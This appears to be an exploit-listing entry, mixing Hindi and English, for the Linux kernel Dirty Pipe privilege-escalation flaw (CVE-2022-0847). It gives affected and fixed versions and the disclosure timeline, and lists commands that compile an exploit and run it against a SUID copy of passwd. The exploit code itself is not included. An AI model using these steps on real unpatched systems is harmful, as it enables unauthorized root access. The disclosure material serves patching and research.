
Linux कर्नेल CVE-2022-0847 (डर्टी पाइप) के लिए स्थानीय विशेषाधिकार वृद्धि शोषण, प्रभावित सिस्टम पर मनमानी फ़ाइल ओवरराइट और विशेषाधिकार वृद्धि की अनुमति देता है।
Exploit Title: Local Privilege Escalation in Linux kernel (CVE-2022-0847)
Tested on: ubuntu 20.04.1 LTS
Affect product:Linux kernel 5.8 or later
Fixed Product:Linux kernel 5.16.11, 5.15.25, 5.10.102
CVE ID: CVE-2022-0847
स्थानीय विशेषाधिकार वृद्धि
gcc exploit.c -o exploit
cp /bin/passwd .
sudo chown root:root ./passwd
sudo chmod +s ./passwd
./exploit ./passwd
https://dirtypipe.cm4all.com/ https://sysdig.com/blog/cve-2022-0847-dirty-pipe-sysdig/
2021-04-29: फ़ाइल भ्रष्टाचार के बारे में पहला सहायता टिकट
2022-02-19: फ़ाइल भ्रष्टाचार की समस्या Linux kernel बग के रूप में पहचानी गई, जो एक शोषण योग्य कमज़ोरी निकली
2022-02-20: बग रिपोर्ट, शोषण और पैच Linux kernel security team को भेजा गया
2022-02-21: Google Pixel 6 पर बग पुन: उत्पन्न; बग रिपोर्ट Android Security Team को भेजी गई
2022-02-21: Linus Torvalds, Willy Tarreau और Al Viro के सुझाव पर पैच LKML को भेजा गया (बिना कमज़ोरी विवरण के)
2022-02-23: मेरे बग फिक्स के साथ Linux स्थिर रिलीज़ (5.16.11, 5.15.25, 5.10.102)
2022-02-24: Google ने मेरे बग फिक्स को Android kernel में मर्ज किया
2022-02-28: linux-distros मेलिंग सूची को सूचित किया गया
2022-03-07: सार्वजनिक प्रकटीकरण